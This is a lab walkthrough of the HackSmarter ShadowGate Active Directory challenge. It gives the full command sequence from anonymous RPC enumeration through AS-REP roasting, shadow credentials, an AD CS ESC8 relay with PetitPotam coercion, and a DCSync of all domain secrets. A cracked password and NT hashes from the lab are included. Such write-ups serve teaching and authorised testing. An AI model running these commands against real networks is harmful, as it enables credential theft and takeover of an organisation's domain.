# ShadowGate (Easy) - HackSmarter

<figure><img src="/files/q793CxEsXWfSHisuye6a" alt=""><figcaption></figcaption></figure>

### Objective <a href="#user-content-objective" id="user-content-objective"></a>

**ShadowGate** recently completed a corporate acquisition that significantly expanded its internal network, user base, and application footprint. Several business-critical systems were migrated and consolidated under tight operational deadlines to minimize downtime and maintain service continuity.

While functional validation was completed, the organization deferred a comprehensive security assessment due to delivery pressure and staffing constraints. Leadership has since requested an independent penetration test to validate the security posture of the newly created environment and identify any material risk before the next audit cycle.

The assessment will evaluate whether a motivated attacker with standard network access could compromise sensitive systems, escalate privileges, or move laterally within the enterprise environment.

The Hack Smarter team has been authorized to perform a black box internal penetration test against the ShadowGate environment.

#### Initial Access <a href="#user-content-initial-access" id="user-content-initial-access"></a>

The client has provided you with VPN access to their internal network, but no credentials.

### Scanning

```
nmap -p- --min-rate 1000 10.0.29.226 --open
```

<figure><img src="/files/NP6lTp8LiBfuGhWImGp8" alt=""><figcaption></figcaption></figure>

### RPC Enumeration

A null session is accepted, so `querydispinfo` lists the domain users. The eighth whitespace-separated field of each output line is the sAMAccountName, which we save as our user list:

```
rpcclient -U '' -N 10.0.29.226 -c 'querydispinfo' | awk '{print $8}' | tee usernames
```

<figure><img src="/files/unCRXdePdo0NSwyZjWCz" alt=""><figcaption></figcaption></figure>

#### Enumerating with enum4linux-ng

```
enum4linux-ng -A 10.0.29.226
```

`Lockout threshold: 10`

An account locks after 10 bad passwords, so any later password spraying has to stay well under that per account. The AS-REP roasting below avoids the problem entirely: it never sends a password guess to the KDC.

### AS-REP

* **AS-REP roasting** targets accounts with **"Do not require Kerberos preauthentication"** enabled.
* Because the KDC does not demand pre-authentication, anyone can request an **AS-REP** (Authentication Service Reply) for such an account *without knowing its password*; the KDC answers with a blob encrypted under a key derived from that password.
* The returned hash (`$krb5asrep$23$user@REALM:...`, etype 23 = RC4-HMAC) is cracked offline with Hashcat (mode 18200) or John. Nothing in this step counts against the lockout threshold.

`kerbrute userenum` validates the list harvested over RPC against the KDC; with `--downgrade` it requests RC4 (etype 23) and prints the AS-REP hash of any account that does not require pre-authentication:

```
kerbrute userenum --domain shadow.gate usernames --dc 10.0.29.226 --downgrade
```

<figure><img src="/files/zGh5P8EFDxI7zJ2Jo4gz" alt=""><figcaption></figcaption></figure>
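As an added illustration that is not part of the original writeup: the two shell functions below pull the `$krb5asrep$` tokens out of kerbrute's output and split one into its fields, so you can see what the crackable blob contains before handing it to hashcat. The kerbrute output and the hash value are constructed samples, not the lab's real hash.

```sh
#!/bin/sh
# Added example, not from the original writeup. POSIX sh only.

# Constructed sample of kerbrute userenum output (timestamps and hash are made up).
SAMPLE_ASREP='$krb5asrep$23$jtrueblood@SHADOW.GATE:5d2a3a6f1b9c8e7d4f3a2b1c0d9e8f7a$0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a69788796a5b4c3d2e1f0'
SAMPLE_KERBRUTE="2025/01/01 10:00:00 >  [+] VALID USERNAME:       administrator@shadow.gate
2025/01/01 10:00:00 >  [+] jtrueblood has no pre auth required. Dumping hash to crack offline:
$SAMPLE_ASREP
2025/01/01 10:00:00 >  Done! Tested 2 usernames (2 valid) in 0.050 seconds"

# asrep_extract: read tool output on stdin, print only the $krb5asrep$ tokens,
# one per line, ready to be saved as hashcat input.
asrep_extract() {
    grep -o '\$krb5asrep\$[^[:space:]]*'
}

# asrep_parse HASH: print "user realm etype checksum_len encpart_len".
# Returns 1 unless HASH is a well-formed etype-23 AS-REP hash, i.e.
# $krb5asrep$23$user@REALM:<32 hex checksum>$<hex encrypted part>.
asrep_parse() {
    asrep=$1
    prefix='$krb5asrep$'
    d='$'
    case $asrep in
        '$krb5asrep$'*) ;;
        *) return 1 ;;
    esac
    rest=${asrep#"$prefix"}        # 23$user@REALM:checksum$encpart
    etype=${rest%%"$d"*}           # 23 = RC4-HMAC (hashcat -m 18200)
    rest=${rest#*"$d"}             # user@REALM:checksum$encpart
    principal=${rest%%:*}          # user@REALM
    rest=${rest#*:}                # checksum$encpart
    checksum=${rest%%"$d"*}        # HMAC-MD5 over the enc-part, 16 bytes
    encpart=${rest#*"$d"}          # RC4-encrypted timestamp and session key
    user=${principal%@*}
    realm=${principal#*@}
    case $checksum$encpart in
        *[!0-9a-fA-F]*|'') return 1 ;;   # both halves must be hex
    esac
    [ "$etype" = 23 ] && [ ${#checksum} -eq 32 ] || return 1
    printf '%s %s %s %s %s\n' "$user" "$realm" "$etype" ${#checksum} ${#encpart}
}

# Typical use: kerbrute ... | asrep_extract > asrep.hashes, then sanity-check each line.
printf '%s\n' "$SAMPLE_KERBRUTE" | asrep_extract | while read -r h; do
    asrep_parse "$h" || echo "malformed: $h" >&2
done
```

The parse step is a cheap guard against a truncated copy-paste: hashcat mode 18200 expects exactly a 16-byte checksum followed by the encrypted part, and a hash that fails this check will only produce a cryptic "token length exception".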

Cracking the hash with hashcat. Mode 18200 is the AS-REP etype 23 format; recent hashcat versions auto-detect it, but naming it explicitly avoids a wrong guess:

```
hashcat -m 18200 jtrueblood.hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/XabVE63kurPFa2W52Q4Q" alt=""><figcaption></figcaption></figure>

```
jtrueblood : blood_brothers
```

### Auth as jtrueblood

```
nxc smb shadow.gate -u jtrueblood -p blood_brothers --shares
```

<figure><img src="/files/kI7rRasH2ovMo5FXDq7X" alt=""><figcaption></figcaption></figure>

* `CertEnroll` shows up in the share listing. That is the default share an AD CS certification authority publishes, so AD CS is likely present in the environment; we keep a note of it for later.

### Bloodhound Data Collection

```
bloodhound-python -u jtrueblood -p blood_brothers  -ns 10.0.29.226   -c All -d shadow.gate --zip
```

<figure><img src="/files/wIEG7rHuVE48xjVGjfpV" alt=""><figcaption></figcaption></figure>

Analyzing the BloodHound data, we find an ACL edge from our user: jtrueblood has GenericWrite over the user BBROWN.

### GenericWrite

<figure><img src="/files/Qv8KASSzwuOQtD1gkNnq" alt=""><figcaption></figcaption></figure>

Shadow credentials. GenericWrite on a user object lets us write its `msDS-KeyCredentialLink` attribute. Adding our own key pair there lets us authenticate as BBROWN with PKINIT, and Certipy's `shadow auto` uses that certificate to retrieve the account's NT hash:

```
certipy shadow auto -u 'jtrueblood@shadow.gate' -p 'blood_brothers' -account BBROWN
```

<figure><img src="/files/qQVlIUPp9rcksozGNhie" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZTLccyCT1MRzfMlRkFGr" alt=""><figcaption></figcaption></figure>

* BBROWN is a member of `ADCS Reader`, so we enumerate AD CS as that account next.

### Certipy

`certipy find` enumerates the CAs and certificate templates. `-hashes` takes the NT hash recovered in the previous step (the LM half can be omitted) and `-vulnerable` limits the output to the misconfigurations Certipy recognises:

```
certipy find -u BBROWN@shadow.gate -hashes 259745cb123a52aa2e693aaacca2db52 -vulnerable -stdout
```

```
  ESC8                              : Web Enrollment is enabled over HTTP.
```

ESC8 means the CA's web enrollment endpoint (`/certsrv`) accepts NTLM authentication over plain HTTP, with no TLS and therefore no channel binding. Any NTLM authentication we can relay to it enrolls a certificate as the relayed principal.

<figure><img src="/files/albbBkg1YfGmydFDmHmh" alt=""><figcaption></figcaption></figure>
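Before wiring up a relay, it is worth confirming the ESC8 precondition by hand. The shell functions below, added here as an illustration and not part of the original writeup or of Certipy, classify the response of the CA's `/certsrv/` endpoint: a 401 carrying an NTLM or Negotiate challenge on plain HTTP is what the relay needs, while a redirect to `https://` means the HTTP path is closed. `esc8_probe` needs network access; the header samples are constructed, and the hostname `dc01.shadow.gate` in them is an assumption.

```sh
#!/bin/sh
# Added example, not from the original writeup or from Certipy. POSIX sh plus curl.

# esc8_classify HEADERS: HEADERS is the raw response-header block of a request to
# http://<ca>/certsrv/. Prints one of:
#   ntlm-over-http  401 with an NTLM or Negotiate challenge on plain HTTP (the ESC8
#                   precondition; Negotiate falls back to NTLM unless Kerberos-only is enforced)
#   https-redirect  plain HTTP redirects to https://, so there is nothing to relay to over HTTP
#   no-ntlm         anything else (endpoint missing, anonymous, or another auth scheme)
# Exit status is 0 only for ntlm-over-http.
esc8_classify() {
    hdrs=$1
    status=$(printf '%s\n' "$hdrs" | head -n 1 | awk '{print $2}')
    case $status in
        401)
            if printf '%s\n' "$hdrs" | grep -iqE '^www-authenticate: *(ntlm|negotiate)'; then
                echo ntlm-over-http
                return 0
            fi
            echo no-ntlm
            return 1 ;;
        301|302|307|308)
            if printf '%s\n' "$hdrs" | grep -iqE '^location: *https://'; then
                echo https-redirect
            else
                echo no-ntlm
            fi
            return 1 ;;
        *)
            echo no-ntlm
            return 1 ;;
    esac
}

# esc8_probe CA_HOST: fetch the headers live (needs network; not used by the samples below).
esc8_probe() {
    esc8_classify "$(curl -s -I --max-time 10 "http://$1/certsrv/")"
}

# Constructed samples, not captured from the lab. The first is the weak configuration
# Certipy reports as ESC8; the second is what you see once web enrollment is HTTPS-only,
# the usual first remediation alongside Extended Protection for Authentication.
SAMPLE_VULN='HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 1293'

SAMPLE_FIXED='HTTP/1.1 301 Moved Permanently
Location: https://dc01.shadow.gate/certsrv/
Content-Length: 0'

esc8_classify "$SAMPLE_VULN"              # ntlm-over-http
esc8_classify "$SAMPLE_FIXED" || true     # https-redirect (exit status 1)
```

Run `esc8_probe 10.0.29.226` against the live CA to reproduce Certipy's ESC8 verdict without touching the relay tooling; a `https-redirect` or `no-ntlm` result means the relay chain below will not work as written.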

### Exploiting ESC8

1. **Set up NTLM relay:** run a relay listener, such as Certipy's `relay` command, pointed at the CA's web enrollment endpoint.
2. **Coerce authentication:** make a privileged account authenticate to the attacker's host with NTLM. Domain Controller machine accounts are the usual target, coerced here with PetitPotam (MS-EFSRPC).

When the relayed account is a Domain Controller, request the `DomainController` template: DCs have enrollment rights on it by default, and the resulting certificate authenticates as the DC machine account:

```
certipy-ad relay -target 10.0.29.226 -template 'DomainController'
```

With the relay listening, coerce the DC (10.0.29.226) into authenticating to our host (10.200.54.19); PetitPotam takes the listener first and the target second:

```
python PetitPotam.py -u jtrueblood -p blood_brothers 10.200.54.19 10.0.29.226
```

<figure><img src="/files/JEhpXpXTJUxyPTiWr6ca" alt=""><figcaption></figcaption></figure>

The relay writes the DC's certificate to `dc01.pfx`. Authenticating with it over PKINIT yields a TGT for `dc01$` and, through Kerberos U2U, the account's NT hash:

```
certipy-ad auth -pfx 'dc01.pfx' -dc-ip '10.0.29.226'
```

<figure><img src="/files/YRKrHToZAgCQ9yGocNI8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vhfFljqo9FA6w3LJgVjL" alt=""><figcaption></figcaption></figure>

A Domain Controller machine account can replicate the directory, so its hash is enough to DCSync every domain secret:

```
impacket-secretsdump shadow.gate/'dc01$'@10.0.29.226 -hashes :57867e655d1abc9f45fd6e954e351531
```

<figure><img src="/files/n6QFylwMnjNJf48LmXNp" alt=""><figcaption></figcaption></figure>

References:

{% embed url="https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation" %}

